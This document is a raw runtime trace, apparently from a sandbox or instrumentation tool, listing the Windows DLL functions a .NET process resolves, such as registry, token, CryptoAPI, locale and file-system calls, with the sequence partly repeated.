DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: propsys.dll/
DynamicLoader: propsys.dll/PSGetNameFromPropertyKey
DynamicLoader: propsys.dll/PSStringFromPropertyKey
DynamicLoader: propsys.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToGUID
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/GetSecurityInfo
DynamicLoader: ADVAPI32.dll/SetSecurityInfo
DynamicLoader: ADVAPI32.dll/GetSecurityDescriptorControl
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
